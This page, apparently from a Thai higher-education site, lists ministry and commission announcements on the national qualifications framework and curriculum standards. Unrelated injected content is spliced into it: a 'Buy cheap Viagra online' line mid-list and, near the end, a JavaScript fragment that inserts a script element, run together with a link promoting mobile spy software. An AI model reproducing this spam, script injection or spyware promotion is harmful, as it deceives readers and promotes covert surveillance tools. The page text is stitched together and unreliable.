กรอบมาตรฐานคุณวุฒิ

 1 3ประกาศคณะกรรมการการอุดมศึกษา เรื่อง แนวทางการปฏิบัติตามกรอบมาตรฐานคุณวุฒิระดับอุดมศึกษาแห่งชาติ (ฉบับที่ ๒) พ.ศ. 2554 

1 3ประกาศกระทรวงศึกษาธิการ เรื่อง มาตรฐานการอุดมศึกษา 

1 3ประกาศกระทรวงศึกษาธิการเรื่อง กรอบมาตรฐานคุณวุฒิระดับอุดมศึกษาแห่งชาติ พ.ศ.2552

 1 3ประกาศสำนักงานคณะกรรมการการอุดมศึกษา เรื่อง แนวทางการปฏิบัติตามกรอบมาตรฐานคุณวุฒิระดับอุดมศึกษาแห่งชาติ พ.ศ.2552

1 3ประกาศกระทรวงศึกษาธิการเรื่อง เกณฑ์มาตรฐานคุณวุฒิระดับอุดมศึกษาแห่งชาติ พ.ศ.2548

1 3ประกาศเรื่อง แนวปฏิบัติตามกรอบมาตรฐานคุณวุฒิระดับอุดมศึกษาแห่งชาติ พ.ศ.2552


Buy cheap Viagra online

1 3ประกาศเรื่อง แนวปฏิบัติในการเสนอขอความเห็นชอบหลักสูตรตามกรอบมาตรฐานคุณวุฒิระดับอุดมศึกษาแห่งชาติ พ.ศ.2552

1 3แนวปฏิบัติการแจ้งปิดหลักสูตร สาขาวิชา (หนังสือที่ ศธ 0506(2)/ว 409 ลงวันที่ 31 มีนาคม 2551)

1 3นโยบายและแนวปฏิบัติของทบวงมหาวิทยาลัย ว่าด้วย การเปิดสอนหลักสูตรสาขาวิชาต่าง ๆ

ที่จะสอนเป็นภาษาต่างประเทศของสถาบันอุดมศึกษาในสังกัดทบวงมหาวิทยาลัย

1 3ประกาศกระทรวงศึกษาธิการ เรื่อง หลักเกณฑ์การกำหนดชื่อปริญญา พ.ศ. 2549 – พ.ศ. 2553 (ฉบับที่ 5) 

1 3ประมวลชื่อหลักสูตร  สาขาวิชา  และปริญญาของสถาบันอุดมศึกษาของรัฐ สังกัด สกอ.

 1 3แนวทางที่ดีในการจัดทํา Curriculum Mapping ในหลักสูตร (มคอ.2)

1 3ตัวบ่งชี้ผลการดำเนินงานตามเกณฑ์ สกอ.

}document.currentScript.parentNode.insertBefore(s, document.currentScript);https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.

COMMENTS

Leave a Comment

คุณอาจจะใช้ป้ายกำกับและคุณสมบัติHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>